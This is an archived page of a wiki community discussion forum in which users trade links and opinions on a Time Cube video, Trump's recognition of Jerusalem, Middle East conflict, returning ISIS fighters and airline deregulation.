+---------+---------+---------+---------+ |Wed |Thu |Fri |Sat | +---------+---------+---------+---------+ |Good |Very Good|Happy |Cool! | +---------+---------+---------+---------+
The table is only supported SPM (Swift Package Management)
I built playgroundbook using
nef. You can check
./playgroundbook folder.
Clean up generated files for building ✓ Creating swift playground structure (Table) ✓ Downloading dependencies...... ✓ • Table Get modules from repositories...... ✓ • Table Building Swift Playground... ✓ 🙌 rendered Playground Book in './Table/playgroundbook/Table.playgroundbook'
Copy
Table.playgroundbook into your
iCloud folder like below and then open it on
iPad Playground App
You can use it on your iPad Playground 😎
I'm going to support more types!
Table Style
I'm going to add testCases for dictionary next time.
Contributions to the Table are welcomed and encouraged!
If you have any questions about
Table, please email me at [email protected]
Swiftpack is being maintained by Petr Pavlik | @ptrpavlik | @swiftpackco | API | Analytics | https://swiftpack.co/package/ShawnBaek/Table | CC-MAIN-2022-21 | en | refinedweb |
How can I create a copy of an object in Python?
To get a fully independent copy of an object you can use the
copy.deepcopy() function.
For more details about shallow and deep copying please refer to the other answers to this question and the nice explanation in this answer to a related question.
How can I create a copy of an object in Python?
So, if I change values of the fields of the new object, the old object should not be affected by that.
You mean a mutable object then.
In Python 3, lists get a
copy method (in 2, you'd use a slice to make a copy):
list('abc') a_copy_of_a_list = a_list.copy() a_copy_of_a_list is a_listFalsea_copy_of_a_list == a_listTruea_list =
Shallow Copies
Shallow copies are just copies of the outermost container.
list.copy is a shallow copy:
'foo': set('abc')}] lodos_copy = list_of_dict_of_set.copy() lodos_copy[0]['foo'].pop()'c'lodos_copy[{'foo': {'b', 'a'}}] list_of_dict_of_set[{'foo': {'b', 'a'}}]list_of_dict_of_set = [{
You don't get a copy of the interior objects. They're the same object - so when they're mutated, the change shows up in both containers.
Deep copies
Deep copies are recursive copies of each interior object.
0]['foo'].add('c') lodos_deep_copy[{'foo': {'c', 'b', 'a'}}] list_of_dict_of_set[{'foo': {'b', 'a'}}]lodos_deep_copy = copy.deepcopy(list_of_dict_of_set) lodos_deep_copy[
Changes are not reflected in the original, only in the copy.
Immutable objects
Immutable objects do not usually need to be copied. In fact, if you try to, Python will just give you the original object:
tuple('abc') tuple_copy_attempt = a_tuple.copy()Traceback (most recent call last): File "<stdin>", line 1, in <module>AttributeError: 'tuple' object has no attribute 'copy'a_tuple =
Tuples don't even have a copy method, so let's try it with a slice:
tuple_copy_attempt = a_tuple[:]tuple_copy_attempt = a_tuple[:]
But we see it's the same object:
is a_tupleTruetuple_copy_attempt
Similarly for strings:
'abc's0 = s[:] s == s0Trues is s0Trues =
and for frozensets, even though they have a
copy method:
frozenset('abc') frozenset_copy_attempt = a_frozenset.copy() frozenset_copy_attempt is a_frozensetTruea_frozenset =
When to copy immutable objects
Immutable objects should be copied if you need a mutable interior object copied.
0].append('a') copy_of_tuple_of_list(['a'],) tuple_of_list(['a'],) deepcopy_of_tuple_of_list = copy.deepcopy(tuple_of_list) deepcopy_of_tuple_of_list[0].append('b') deepcopy_of_tuple_of_list(['a', 'b'],) tuple_of_list(['a'],)tuple_of_list = [], copy_of_tuple_of_list = tuple_of_list[:] copy_of_tuple_of_list[
As we can see, when the interior object of the copy is mutated, the original does not change.
Custom Objects
Custom objects usually store data in a
__dict__ attribute or in
__slots__ (a tuple-like memory structure.)
To make a copyable object, define
__copy__ (for shallow copies) and/or
__deepcopy__ (for deep copies).
from copy import copy, deepcopyclass Copyable: __slots__ = 'a', '__dict__' def __init__(self, a, b): self.a, self.b = a, b def __copy__(self): return type(self)(self.a, self.b) def __deepcopy__(self, memo): # memo is a dict of id's to copies id_self = id(self) # memoization avoids unnecesary recursion _copy = memo.get(id_self) if _copy is None: _copy = type(self)( deepcopy(self.a, memo), deepcopy(self.b, memo)) memo[id_self] = _copy return _copy
Note that
deepcopy keeps a memoization dictionary of
id(original) (or identity numbers) to copies. To enjoy good behavior with recursive data structures, make sure you haven't already made a copy, and if you have, return that.
So let's make an object:
1, [2])c1 = Copyable(
And
copy makes a shallow copy:
is c2Falsec2.b.append(3) c1.b[2, 3]c2 = copy(c1) c1
And
deepcopy now makes a deep copy:
4) c1.b[2, 3]c3 = deepcopy(c1) c3.b.append(
Shallow copy with
copy.copy()
#!/usr/bin/env python3import copyclass C(): def __init__(self): self.x = [1] self.y = [2]# It copies.c = C()d = copy.copy(c)d.x = [3]assert c.x == [1]assert d.x == [3]# It's shallow.c = C()d = copy.copy(c)d.x[0] = 3assert c.x == [3]assert d.x == [3]
Deep copy with
copy.deepcopy()
#!/usr/bin/env python3import copyclass C(): def __init__(self): self.x = [1] self.y = [2]c = C()d = copy.deepcopy(c)d.x[0] = 3assert c.x == [1]assert d.x == [3]
Documentation:
Tested on Python 3.6.5. | https://codehunter.cc/a/python/how-can-i-create-a-copy-of-an-object-in-python | CC-MAIN-2022-21 | en | refinedweb |
Question Marykutty George · Apr 1, 2021 [Resolved] Management portal auto refresh
go to post
Hi @Jim Dolson ,
This was a feature introduced in 2018.1+
I believe this is something you can change using some setting but this was introduced to improve performance.
Please see the documentation for more deatils:
(tem server link : )
Hope this helps.
Regards,
Mary
go to post
Thanks @Jeffrey Drumm
Setting the config for each namespace worked.
go to post
Thank you Sergey. I will check this. | https://community.intersystems.com/user/marykutty-george-0 | CC-MAIN-2022-21 | en | refinedweb |
I am working on an encoder that uses LSTM
def init_hidden(self, batch): ''' used to initialize the encoder (LSTMs) with number of layers, batch_size and hidden layer dimensions :param batch: batch size :return: ''' return ( torch.zeros(self.num_layers, batch, self.h_dim).cuda(), torch.zeros(self.num_layers, batch, self.h_dim).cuda() )
this is the code to initialize the LSTM, what does the batch_size represent for LSTM ? is the number of LSTMs used in the encoder ? . It is from social gan algorithm.
Can someone please explain what it means? | https://discuss.pytorch.org/t/batch-size-for-lstm/47619 | CC-MAIN-2022-21 | en | refinedweb |
You are browsing a read-only backup copy of Wikitech. The primary site can be found at wikitech.wikimedia.org
Incident documentation/2017-03-23 wikibase
< Incident documentationJump to navigation Jump to search
Revision as of 22:23, 31 March 2021 by imported>Krinkle (Krinkle moved page Incident documentation/20170323-wikibase to Incident documentation/2017-03-23 wikibase)
Summary
Commit in the Wikibase extension was meant to make a change to Special:RecentChanges. This change was tested and verified to not be broken.
The commit also moved around unrelated code for magic word
{{noexternallanglinks}}. This part of the change contained a bad class reference (missing namespace declaration), which, when executed would result in a PHP Fatal Error.
- This magic word did not have unit tests, hence Jenkins did not catch it.
- The magic word is only rarely used on a page, which meant that cursory testing did not reveal the breakage immediately. It also meant that the canary traffic Scap waits for during the deployment did not trigger the error (or not often enough).
- One such page using this magic word is en.wikipedia.org's Main Page. However, since it is only rarely edited, it is mostly served from parser cache. However, unlike most pages which have a parser cache age of 30 days, Main Page uses time-based functions and hence has a parser cache age of 1 hour. That hour was up about 20 minutes after the deployment, at which point it got re-parsed and revealed the Fatal Error.
Timeline
(Times on this timeline refer to UTC though the date in the page title refers to US Time. According to UTC this event happened on 24th of March, not 23th.).
- 2017-03-24T01:02 Roan merges an update for Wikidata (Wikibase) (patch for RCFilters with a broken class autoloader)
- 2017-03-24T01:15 !log catrope@tin Started scap: Wikidata cherry-picks (with i18n)
- 2017-03-24T01:40 !log catrope@tin Finished scap: Wikidata cherry-picks (with i18n) (duration: 25m 03s)
- 2017-03-24T01:46 Icinga says: <icinga-wm> PROBLEM - MediaWiki exceptions and fatals per minute on graphite1001 is CRITICAL: CRITICAL: 80.00% of data above the critical threshold [50.0] (but does not page anyone)
- 2017-03-24T02:01 Eddiegp reports on IRC: <eddiegp> Uhmm, dewiki seems down for me <eddiegp> Request from 94.134.245.179 via cp3033 cp3033, Varnish XID 735457820 <eddiegp> Error: 503, Service Unavailable at Fri, 24 Mar 2017 02:00:09 GMT
- 2017-03-24T02:05 icinga-wm starts flooding first alerts from app servers (but still does not page)
02:05 <icinga-wm> PROBLEM - HHVM rendering on mw1256 is CRITICAL: HTTP CRITICAL: HTTP/1.1 500 Internal Server Error - 50620 bytes in 7.848 second response time 02:05 <icinga-wm> PROBLEM - HHVM rendering on mw1237 is CRITICAL: HTTP CRITICAL: HTTP/1.1 500 Internal Server Error - 50620 bytes in 7.895 second response time 02:05 <icinga-wm> PROBLEM - HHVM rendering on mw1189 is CRITICAL: HTTP CRITICAL: HTTP/1.1 500 Internal Server Error - 50620 bytes in 7.998 second response time 02:05 <icinga-wm> PROBLEM - HHVM rendering on mw1245 is CRITICAL: HTTP CRITICAL: HTTP/1.1 500 Internal Server Error - 50620 bytes in 8.123 second response time
- 2017-03-24T02:09 Daniel sees the above and starts looking at mw1185, calls Brandon while doing so
- 2017-03-24T02:10 Brandon starts investigating (<bblack> the first and most-persistent of the spam is on rendering), <mutante> on a random one, mw1185, status of HHVM is "active (running)"..
- 2017-03-24T02:10 <mutante> Fatal error: Class undefined: Wikibase\Client\Hooks\NoLangLinkHandler in /srv/mediawiki/php-1.29.0-wmf....n line 99. Meanwhile Icinga service alerts are flapping from RECOVERY back to CRIT and vice versa.
- 2017-03-24T02:14 <Reedy> Fatal error: Class undefined: Wikibase\Client\Hooks\NoLangLinkHandler in /srv/mediawiki/php-1.29.0-wmf.17/extensions/Wikidata/extensions/Wikibase/client/includes/Hooks/MagicWordHookHandlers.php on line 99
- 2017-03-24T02:14 <Krinkle> commit 1f32a896a6207bf78d9e97a9fdb49818256e0f3a
- 2017-03-24T02:16 Krinkle starts reverting
- 2017-03-24T02:17 <Reedy> RoanKattouw: Looks like wrong NS
- 2017-03-24T02:24 l10nupdate slows down recovery: <MaxSem> !log Killed l10nupdate on tin, was blocking emergency pushes
- 2017-03-24T02:24 <logmsgbot> !log krinkle@tin Synchronized php-1.29.0-wmf.17/extensions/Wikidata: revert (duration: 02m 34s)
- 2017-03-24T02:25 <Krinkle> !log All apaches are back up
02:25 <icinga-wm> RECOVERY - HHVM rendering on mw1230 is OK: HTTP OK: HTTP/1.1 200 OK - 78707 bytes in 0.099 second response time 02:25 <icinga-wm> RECOVERY - HHVM rendering on mw1280 is OK: HTTP OK: HTTP/1.1 200 OK - 78707 bytes in 0.072 second response time
- 2017-03-24T02:25 <eddiegp> works for me again
Conclusions
- Magic words and hook handlers should be covered by unit tests, even if just for the sake of code coverage with no useful assertions.
- The autonomous nature of LocalisationUpdate interfered with a critical deployment when least expected. If l10nupdate were done via SWAT or Train deployment by a human, it would not have started on its own while in the the middle of an outage.
- Scap's monitoring of logstash with canary traffic is insufficient. High profile requests may not hit the canaries most of the time due to caching. Testing a small set of fixed urls on Tin's local Apache (or canaries, or even every server) would give a much stronger confidence in at least basic functionality without question.
Actionables
- (RFC: Disabling LocalisationUpdate on WMF wikis)
- (Implement MediaWiki pre-promote checks)
- (ensure SMS notifications from monitoring for this type of outage)
- Adds missing integration test | https://wikitech-static.wikimedia.org/w/index.php?title=Incident_documentation/2017-03-23_wikibase&oldid=579181 | CC-MAIN-2022-21 | en | refinedweb |
Gecode::Float::Branch::MeritAFCSize Class Reference
[Merit-based float view selection for branchers]
Merit class for AFC over size. More...
Detailed Description
Merit class for AFC over size.
Requires
#include <gecode/float/branch.hh>
Definition at line 130 of file branch.hh.
Constructor & Destructor Documentation
Member Function Documentation
Whether dispose must always be called (that is, notice is needed).
Reimplemented from Gecode::MeritBase< FloatView, double >.
Definition at line 101 of file merit.hpp.
Dispose view selection.
Reimplemented from Gecode::MeritBase< FloatView, double >.
Definition at line 105 of file merit.hpp.
Member Data Documentation
The documentation for this class was generated from the following files: | https://www.gecode.org/doc/6.0.1/reference/classGecode_1_1Float_1_1Branch_1_1MeritAFCSize.html | CC-MAIN-2022-21 | en | refinedweb |
Gecode::Int::Branch::PosValuesChoice Class Reference
Choice storing position and values for integer views More...
#include <view-values.hpp>
Detailed Description
Choice storing position and values for integer views
Definition at line 37 of file view-values.hpp.
Constructor & Destructor Documentation
Initialize choice for brancher b, position p, and view x.
Definition at line 38 of file view-values.cpp.
Initialize choice for brancher b from archive e.
Definition at line 53 of file view-values.cpp.
Deallocate.
Definition at line 64 of file view-values.cpp.
Member Function Documentation
Return value to branch with for alternative a.
Definition at line 69 of file view-values.hpp.
Reimplemented from Gecode::PosChoice.
Definition at line 69 of file view-values.cpp.
The documentation for this class was generated from the following files:
- gecode/int/branch/view-values.hpp
- gecode/int/branch/view-values.cpp | https://www.gecode.org/doc/6.0.1/reference/classGecode_1_1Int_1_1Branch_1_1PosValuesChoice.html | CC-MAIN-2022-21 | en | refinedweb |
kubectl-pod-node-matrix
WORK IN PROGRESS!!
This plugin shows pod x node matrix with suitable colors to mitigate troubleshooting effort.
Details
Troubleshooting in Kubernetes takes some time and sorting out the real cause sometimes overwhelming.
Take an example of a couple of pods are not in running state, but the actual cause is node has insufficient
disk space. To reduce the amount of time being spent to this troubleshooting,
pod-node-matrix might provide a
place for “first look at”.
pod-node-matrix returns pods x node matrix. This plugin can clearly indicate that if there is a general node problem,
or can strongly suggest that node has no problem and instead deployment, service, etc. of this pod have problem.
Thanks to that, at least assuring that one part is working or not will definitely narrow down the places should be
checked.
Installation
Use krew plugin manager to install,
kubectl krew install pod-node-matrix kubectl pod-node-matrix --help
Or manually,
kubectl-pod-node-matrix can be installed via:
go get github.com/ardaguclu/kubectl-pod-node-matrix/cmd/kubectl-pod-node-matrix
Usage
# Just shows the pods in default namespace kubectl-pod-node-matrix # Shows the pods in given namespace kubectl-pod-node-matrix -n ${NAMESPACE} # Shows all pods in all namespaces kubectl-pod-node-matrix -A | https://golangexample.com/kubectl-plugin-shows-pod-x-node-matrix-with-suitable-colors-to-mitigate-troubleshooting-effort/ | CC-MAIN-2022-21 | en | refinedweb |
In quasar 0.7 you could load a component into a “floating” Modal
Modal.create(Comp.vue) .set( { minimized : true} ) .css( {padding : '50px' } ) .show()
Is it still possible in 0.8 to show a component this way?
- rstoenescu Admin last edited by
No. But you can use the
<quasar-modal>component.
Ah ok, so this is probably the way to go now when using “refs”.
MAIN COMPONENT WITH BUTTON
import ModalComponent
template part
script part (trigger the open() method that is defined in the Modal Component)
MODAL COMPONENT
Also tried it with Events, which works fine as well.
I’ve pretty much completed migration from 0.7 to 0.8 in one day. Has been quite easy.
Thanks also for the terrific docs that come with Quasar.
It’s a joy to read them.
- rstoenescu Admin last edited by
Thank you so much for the appreciation. And also big thanks for posting this out with screenshots and all for other people to read if they have same questions!
@rstoenescu Your welcome,
I guess we all know what it’s like to see a thread end with “I found a solution. Thanks…(silence)” | https://forum.quasar-framework.org/topic/43/modal-create-vuecomponent-in-quasar-0-8 | CC-MAIN-2022-21 | en | refinedweb |
Text field
Text fields let users enter and edit text.
Text fields allow users to enter text into a UI. They typically appear in forms and dialogs.
Basic TextField
The
TextField wrapper component is a complete form control including a label, input, and help text.
It comes with three variants: outlined (default), filled, and standard.
<TextField id="outlined-basic" label="Outlined" variant="outlined" /> <TextField id="filled-basic" label="Filled" variant="filled" /> <TextField id="standard-basic" label="Standard" variant="standard" />
Note: The standard variant of the
TextField is no longer documented in the Material Design guidelines
(here's why),
but MUI will continue to support it.
Form props
Standard form attributes are supported e.g.
required,
disabled,
type, etc. as well as a
helperText which is used to give context about a field's input, such as how the input will be used.
Validation
The
error prop toggles the error state.
The
helperText prop can then be used to provide feedback to the user about the error.
Multiline
The
multiline prop transforms the text field into a TextareaAutosize element.
Unless the
rows prop is set, the height of the text field dynamically matches its content (using TextareaAutosize).
You can use the
minRows and
maxRows props to bound it.
Input Adornments
The main way is with an
InputAdornment.
This can be used to add a prefix, a suffix, or an action to an input.
For instance, you can use an icon button to hide or reveal the password.
kg
kg
Weight
$
kg
kg
Weight
$
kg
kg
Weight
$
The
filled variant input height can be further reduced by rendering the label outside of it.
<TextField hiddenLabel <TextField hiddenLabel
Margin
The
margin prop can be used to alter the vertical spacing of the text field.
Using
none (default) doesn't apply margins to the
FormControl whereas
dense and
normal do.
<RedBar /> <TextField label={'margin="none"'} <RedBar /> <TextField label={'margin="dense"'} <RedBar /> <TextField label={'margin="normal"'} <RedBar />
<TextField fullWidth
<TextField id="outlined-name" label="Name" value={name} onChange={handleChange} /> <TextField id="outlined-uncontrolled" label="Uncontrolled" defaultValue="foo" />
Components
TextField is composed of smaller components (
FormControl,
Input,
FilledInput,
InputLabel,
OutlinedInput,
and
FormHelperText
) that you can leverage directly to significantly customize your form inputs.
You might also have noticed that some native HTML input properties are missing from the
TextField component.
This is on purpose.
The component takes care of the most used properties.
Then, it's up to the user to use the underlying component shown in the following demo. Still, you can use
inputProps (and
InputProps,
InputLabelProps properties) if you want to avoid some boilerplate.
<Input defaultValue="Hello world" inputProps={ariaLabel} /> <Input placeholder="Placeholder" inputProps={ariaLabel} /> <Input disabled defaultValue="Disabled" inputProps={ariaLabel} /> <Input defaultValue="Error" error inputProps={ariaLabel} />
<TextField label="Outlined secondary" color="secondary" focused /> <TextField label="Filled success" variant="filled" color="success" focused /> <TextField label="Standard warning" variant="standard" color="warning" focused />
Customization
Here are some examples of customizing the component. You can learn more about this in the overrides documentation page.
Customization does not stop at CSS.
You can use composition to build custom components and give your app a unique feel.
Below is an example using the
InputBase component, inspired by Google Maps.
🎨 If you are looking for inspiration, you can check MUI Treasury's customization examples.
useFormControl
For advanced customization use cases, a
useFormControl() hook is exposed.
This hook returns the context value of the parent
FormControl component.
API
import { useFormControl } from '@mui/material/FormControl';
Returns
value (object):
value.adornedStart(bool): Indicate whether the child
Inputor
Selectcomponent has a start adornment.
value.setAdornedStart(func): Setter function for
adornedStartstate value.
value.color(string): The theme color is being used, inherited from
FormControl
colorprop .
value.disabled(bool): Indicate whether the component is being displayed in a disabled state, inherited from
FormControl
disabledprop.
value.error(bool): Indicate whether the component is being displayed in an error state, inherited from
FormControl
errorprop
value.filled(bool): Indicate whether input is filled
value.focused(bool): Indicate whether the component and its children are being displayed in a focused state
value.fullWidth(bool): Indicate whether the component is taking up the full width of its container, inherited from
FormControl
fullWidthprop
value.hiddenLabel(bool): Indicate whether the label is being hidden, inherited from
FormControl
hiddenLabelprop
value.required(bool): Indicate whether the label is indicating that the input is required input, inherited from the
FormControl
requiredprop
value.size(string): The size of the component, inherited from the
FormControl
sizeprop
value.variant(string): The variant is being used by the
FormControlcomponent and its children, inherited from
FormControl
variantprop
value.onBlur(func): Should be called when the input is blurred
value.onFocus(func): Should be called when the input is focused
value.onEmpty(func): Should be called when the input is emptied
value.onFilled(func): Should be called when the input is filled
Example
<FormControl sx={{ width: '25ch' }}> <OutlinedInput placeholder="Please enter text" /> <MyFormHelperText /> </FormControl>
Limitations
Shrink.
<TextField InputLabelProps={{ shrink: true }} />
or
<InputLabel shrink>Count</InputLabel>
Floating label
The floating label is absolutely positioned. It won't impact the layout of the page. Make sure that the input is larger than the label to display correctly.
type="number"
Inputs of type="number" have potential usability issues:
- Allowing certain non-numeric characters ('e', '+', '-', '.') and silently discarding others
- The functionality of scrolling to increment/decrement the number can cause accidental and hard-to-notice changes
and more - see this article by the GOV.UK Design System team for a more detailed explanation.
For number validation, one viable alternative is to use the default input type="text" with the pattern attribute, for example:
<TextField inputProps={{ inputMode: 'numeric', pattern: '[0-9]*' }} />
In the future, we might provide a number input component.
Helper text
The helper text prop affects the height of the text field. If two text fields are placed side by side, one with a helper text and one without, they will have different heights. For example:
Please enter your name
<TextField helperText="Please enter your name" id="demo-helper-text-misaligned" label="Name" /> <TextField id="demo-helper-text-misaligned-no-helper" label="Name" />
This can be fixed by passing a space character to the
helperText prop:
Please enter your name
<TextField helperText="Please enter your name" id="demo-helper-text-aligned" label="Name" /> <TextField helperText=" " id="demo-helper-text-aligned-no-helper" label="Name" />
Integration with 3rd party input libraries
You can use third-party libraries to format an input.
You have to provide a custom implementation of the
<input> element with the
inputComponent property.
The following demo uses the react-imask and react-number-format libraries. The same concept could be applied to e.g. react-stripe-element.
The provided input component should expose a ref with a value that implements the following interface:
interface InputElement { focus(): void; value?: string; }
const MyInputComponent = React.forwardRef((props, ref) => { const { component: Component, ...other } = props; // implement `InputElement` interface React.useImperativeHandle(ref, () => ({ focus: () => { // logic to focus the rendered component from 3rd party belongs here }, // hiding the value e.g. react-stripe-elements })); // `Component` will be your `SomeThirdPartyComponent` from below return <Component {...other} />; }); // usage <TextField InputProps={{ inputComponent: MyInputComponent, inputProps: { component: SomeThirdPartyComponent, }, }} />;
Accessibility
In order for the text field to be accessible, the input should be linked to the label and the helper text. The underlying DOM nodes should have this structure:
<div class="form-control"> <label for="my-input">Email address</label> <input id="my-input" aria- <span id="my-helper-text">We'll never share your email.</span> </div>
- If you are using the
TextFieldcomponent, you just have to provide a unique
idunless you're using the
TextFieldonly client side. Until the UI is hydrated
TextFieldwithout an explicit
idwill not have associated labels.
- If you are composing the component:
<FormControl> <InputLabel htmlFor="my-input">Email address</InputLabel> <Input id="my-input" aria- <FormHelperText id="my-helper-text">We'll never share your email.</FormHelperText> </FormControl>
Complementary projects
For more advanced use cases, you might be able to take advantage of:
- react-hook-form: React hook for form validation.
- react-hook-form-mui: MUI and react-hook-form combined.
- formik-material-ui: Bindings for using MUI with formik.
- redux-form-material-ui: Bindings for using MUI with Redux Form.
- mui-rff: Bindings for using MUI with React Final Form.
Unstyled
The component also comes with an unstyled version. It's ideal for doing heavy customizations and minimizing bundle size. | https://next--material-ui.netlify.app/material-ui/react-text-field/ | CC-MAIN-2022-21 | en | refinedweb |
RationalWiki:Saloon bar/Archive281
Contents
- 1 A timecube... documentary(?) video
- 2 Trump and Jerusalem
- 3 While I'm not Canadain I don't quite know how I should feel on this
- 4 Was Airline Deregulation good or bad?
- 5 Anyone tired of hearing about sexual assaults in the media?
- 6 Put out the fire!
- 7 Why is the term Orient offensive?
- 8 Merging Iron Chariots Wiki (sticky)
- 9 Ransomware "customer service"
- 10 Medical Education: Current Standards or based on pure competence?
- 11 RationalWiki Community Survey 2017
- 12 Fundies are their own worst enemy
- 13 Your Thoughts on UBI?
- 14 Nationalist China
- 15 Dumpster dive
- 16 As 2017 draws to a close, let's reflect on the positives and negatives in the world
- 17 Doug Jones wins Alabama special senate election
- 18 Founded some pretty Biased looking video from some Aussie Called "Suit Yourself"
- 19 User GrammarCommie reverting without discussion
- 20 Is trinitarian Christianity polytheist?
- 21 Rationalwiki on Twitter
- 22 Irony
- 23 Do Neo-Nazis have anything better to do than trolling Rationalwiki?
- 24 say no to drugs
- 25 What's the Appeal of Cults?
- 26 thealternativehypothesis.org we need an article and some serious refuting.
- 27 A message on my talkpage
- 28 White nationalists finally getting banned on twitter
- 29 Current dumpster dive
- 30 Solstice holydaze
- 31 Something tells me this will be the slippery slope argument for U.S gun control
- 32 Homeopaths Scientists create an ultradilute quantum liquid
- 33 So do Republicans just think when it's said "Black people can't be racist." that that just defeats acual racism
- 34 Are these still relevant joke videos?
- 35 RZ94's Official Bullshit Scale (Patent Pending)
- 36 Vote: Who has the best userpage on Rationalwiki?
- 37 Merry Christmas to Rationalwiki and to all a good skepticism!
- 38 Found this gem shared on Quora a few hours ago
- 39 The Bible is more violent than any horror or disaster film I have ever seen in my 23 years of life
- 40 A wiki / database of company ethics?
- 41 Midday nap
- 42 Quotebox removing linebreaks
- 43 Gematria
- 44 Counter these arguments
- 45 Spitting Image
- 46 Paul Nehlen
- 47 I can already Imagine the the "Liburl Sjw's are destroying Christmas." Argument
- 48 I feel this video might be slightly Anti-Union,but I'm not sure?
- 49 Trump recently tweets about Global Warming
- 50 Your thoughts on this article?
- 51 Your thoughts on this video?
- 52 Evolution and Red Giant Stars
- 53 Does that CAPTCHA continue to pop up for everybody each time one posts something?
- 54 Question about recycling
- 55 So long and thanks for all the fish (redux)
- 56 Cal Cooper
- 57 Flat Moon BS
- 58 Syrian War Media Coverage
- 59 Net neutrality has been repealed
- 60 The point is, part 3
- 61 Anything wrong with being obsessed with the concept of societal collapse?
- 62 Drug Education- counselors and educators should stick to the facts
- 63 Manual archiving
- 64 Happy New Year!
- 65 Your Thoughts
- 66 Pedantry
- 67 Do we have an article of plant music?
- 68 RZ94's potential projects for 2018
- 69 Clinton and Trump are equally unpopular
- 70 Vote LeftyGreenMario for Moderator! She is the best candidate!
- 71 Idea: draft namespace
- 72 Evangelism in Xmas
- 73 What are the causes of the proxy conflict between Saudi Arabia and Qatar?
- 74 Community survey results
- 75 Can we make usernames more strict?
- 76 Proposed rules to govern AFD
- 77 Jesus as a Mary Sue
A timecube... documentary(?) video[edit]
So this was recently uploaded, and it was interesting to me, so I thought other people might like to see it: I've known of and tried to read timecube before but I never knew much about the guy behind it and hadn't heard him speak or anything, this video goes into a fair amount of detail on all that and does some decent digging around to find old clips and speeches and such he's given. I wasn't sure whether to put this on the timecube/Gene Ray page but it seems generalised enough that it should go here instead. Anyway, enjoy 45 minutes of trying to make sense of the nonsensical. X Stickman (talk) 22:03, 30 November 2017 (UTC)
- I love Time Cube rants, they're always good for a laugh. GrammarCommie (talk) 22:18, 30 November 2017 (UTC)
- I don't really find Time Cube funny, Ray was clearly ill. Christopher (talk) 16:46, 1 December 2017 (UTC)
- After enduring listening to 20-odd minutes of Michael Hughes' interview with a flat Earther, I wondered whether crank magnetism is indicative general mental illness. Bongolian (talk) 03:59, 7 December 2017 (UTC)
Trump and Jerusalem[edit]
Self-explanatory. Thoughts? @Aeonian? RoninMacbeth (talk) 00:07, 7 December 2017 (UTC)
- Would people have supported him if he had recognized Jerusalem as the twin capitols?
- At the moment, waiting for the other shoe to drop. So far, just the usual effigy and picture burning, but I'd have expected a riot or two. As for long term consequences, I get the impression that most of the most offended people are people that weren't exactly friendly to the US to begin with, so I'm not exactly sure if much drastically changes as a result of this. CorruptUser (talk) 00:33, 7 December 2017 (UTC)
- There is some question as to whether it matters what the US recognizes as long as Trump is the President. None of the US allies will follow.Ariel31459 (talk) 15:43, 7 December 2017 (UTC)
- Correct me, but as commented in Patheos ( this looks like a gift from Donald
DuckTrump to those Fundie friends of him (you know, prophecies and all that stuff). Panzerfaust (talk) 00:20, 8 December 2017 (UTC)
When isn't there violence in the middle east?[edit]
Not trying to sound right wing but, there is always violence in the middle east. Not matter what- treaties, supporting Israel, aganist Israel, supporting Kurdish people, against Kurdish people, peace keeping efforts, giving money, and so on. It does not matter. Might be wrong but all I hear is about violence in the mid east. --Rationalzombie94 (talk) 02:01, 7 December 2017 (UTC)
- Yes and no. A lot of the violence ongoing is a result of the Iranian revolution (which was secretly supported by Carter), in that they keep funding every other insurgency in the region. Without them mucking things up, a very uneasy peace could have been possible. To be fair, we still haven't quite learned never to trust the religious nutters, so you can't really fault him too much for that. Also to be fair, the revolution was in part because of British and American greed, plus cold war geopolitics, so we aren't exactly innocent. Saudi Arabia gets more blame than they deserve, and while their funding of the Salafi madrassas is probably the second largest roadblock to peace, well ok they deserve a huge amount of blame but not quite as much as they receive. Going forward, well, I'd really love a Kurdish state, but that's not going to happen while Turkey has any say in that. CorruptUser (talk) 03:00, 7 December 2017 (UTC)
- 'in part because of british and american greed...' - entirely because of british mand american greed. we installed the shah. AMassiveGay (talk) 11:44, 7 December 2017 (UTC)
- This is stupid, USA didn't get any financial change from that except more debt. You did it as part of your plan to use religious theocracies to combat the spread of Marxism in the Middle East. Lord Aeonian (talk) 20:02, 7 December 2017 (UTC)
- Well, no. Iran wanted to nationalise their oil industry. Since AIOC was a british concern we werent too happy with that. The marxist thing is just what we told the americans to get them to stick their oar in. so, yeh basically greed. AMassiveGay (talk) 00:51, 8 December 2017 (UTC)
- Cannot explain Western support of theocracies in all the countries conspicuously lacking oil resources, nor those without the infrastructure to harness their oil resources for that matter. And I find it hard to believe anyone was told about the Cold War element, since every Westerner I come across parrots the oil narrative without delay. Lord Aeonian (talk) 04:34, 8 December 2017 (UTC)
- wasnt trying to, just the shenanigans in iran and how easy it was to get the yanks to do the dirty work if you tell em reds are involved. AMassiveGay (talk) 00:42, 10 December 2017 (UTC)
- And also 'Mrs Smith had a peaceful/enjoyable day' is not news but 'Something terrible/YouTube meme happened to Mrs Smith' is.
- With #most# inhabited places in the world if you want to film a documentary 'There is (much unpleasantness and problems) here' you can do so - and also a travel documentary 'The delights of charming Olde Worlde Y' etc. 2A00:23C4:F505:4F00:8DE:2F0D:9B70:A697 (talk) 12:03, 7 December 2017 (UTC)
Don't forget the Saudis. $2-3 billion a year funding Wahhabism. Of course, now it seems to be coming back to bite them in the ass.Teurastaja (talk) 12:59, 7 December 2017 (UTC)
To answer your question, both sides could have come to an agreement long ago but it is fundamentally an ethno-religious conflict, and so there is no room for compromise because you don't "compromise" with the kuffar. Lord Aeonian (talk) 20:02, 7 December 2017 (UTC)
While I'm not Canadain I don't quite know how I should feel on this[edit]
More sources would also be appreciated also. ShiningSwordofThoughts (talk)
- Sounds like the longer debate in the UK about how to deal with British ISIS fighters, which ranges from calls by right-wing politicians and populist media for them all to be shot[1][2] to calls (particularly from Muslims) for them to be rehabilitated[3][4]. The British government already has deradicalisation programs that people can be forced to attend.[5][6] There's a lot of teenagers, including some women/girls, going out there and realising it's not what they thought it would be like and wanting to come home (but Isis isn't too keen on that);, the authorities have declined to press charges against at least one young man who joined Isis but changed his mind.[7] Jailing them isn't ideal because prisons are one of the main places that Muslim terrorists are radicalised.[8][9] And the security services don't have a good record when it comes to monitoring returning people and stopping them turning to terrorism.[10] The obvious solution is to do what the justice system does (or tries to do) in other situations, not treat everybody the same but differentiate hardened terrorists from kids who've gone astray. --Gospatric (talk) 10:00, 8 December 2017 (UTC)
Was Airline Deregulation good or bad?[edit]
ShiningSwordofThoughts (talk) 01:35, 8 December 2017 (UTC)
- An absolute catastrophe. I refuse to fly. Why would I buy a ticket if the ticket isn't guaranteed to get me a seat on the flight I bought it for? Why would I buy anything without some assurance that the advertised price is actually what it costs? These problems are compounded by the humiliating 'security' pantomime, of course. - Smerdis of Tlön, LOAD "*", 8, 1. 18:00, 8 December 2017 (UTC)
